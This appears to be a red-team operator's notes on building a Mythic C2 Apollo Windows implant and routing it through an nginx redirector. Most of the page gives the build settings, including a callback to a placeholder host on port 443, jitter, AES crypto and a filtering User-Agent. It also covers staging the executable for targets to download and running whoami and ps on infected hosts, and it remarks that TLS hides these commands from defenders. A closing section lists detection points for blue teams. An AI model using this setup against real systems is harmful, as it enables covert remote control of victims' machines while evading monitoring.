NGINX CONDITIONAL REDIRECTION IMPLEMENTATION

this specific payload creation is for use with nginx custom conditional redirection.

root@oco:~$ BROWSER > {MythicC2} > Create > Create Payload
 Target OS: Windows
 Payload Type: Apollo
 Build Parameters: WinExe
 Build Cmds into Agents: All
 C2 Profiles: HTTP
  #this is the nginx machine
  Callback Host: nuclear.{domain}.{tld}              //this is the nginx vm/redirector ip/fqdn - the nginx redirector will be responsible for forwarding the traffic back to this C2 server NOT the payload agents!
  Callback Interval in seconds: 10
  Callback Jitter in percent: 23
  #the agent deployed on the target will callback to nginx via 443
  Callback Port: 443
  Crypto Type: aes256_hmac
  Get request URI: index
  HTTP Headers:
   #this user-agent string MUST match the one configured in the c2.conf of nginx configuration file in /etc/nginx/conf.d
   User-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
    - ALT value: IPv4 address if used in
       if ($http_user_agent ~ "41.2.228.0") of the /etc/nginx/conf.d file
  
  Kill Date: default
  Name of Query...: default
  Perform Key Exhange: default
  POST request URI...: default
  Proxy Host: default
  Proxy Password: default
  Proxy Port: default
  Proxy Username: default
 Payload Review
  Payload Name: redirect.exe
  Create Payload

 * this payload can be downloaded from the payload section via the download URL
    - once downloaded by the red team operator, it MUST be transferred to the Payload/Malware Server
       - the target(s) downloads these payloads from the payload server
#example trigger
PS C:\target> {payload}.exe

MythicC2 > Active Callbacks
 Interaction: whoami
 Interaction: ps
 
 * since everything is happening via TLS/SSL connection, the blue team won't be able
   to see/decrypt the cmds that were executed
    - blue teams should be able to see an outbound ssl/tls connection to the IP of the
      exposed redirector (aws cloudfront)see 
    - blue teams should also be able to see running processes w/ pids
    - some indicators should also be visible via Windows Event Logs
       - for thorough analysis, implement sysmon on the hosts and send the
         logs to SIEM

Last updated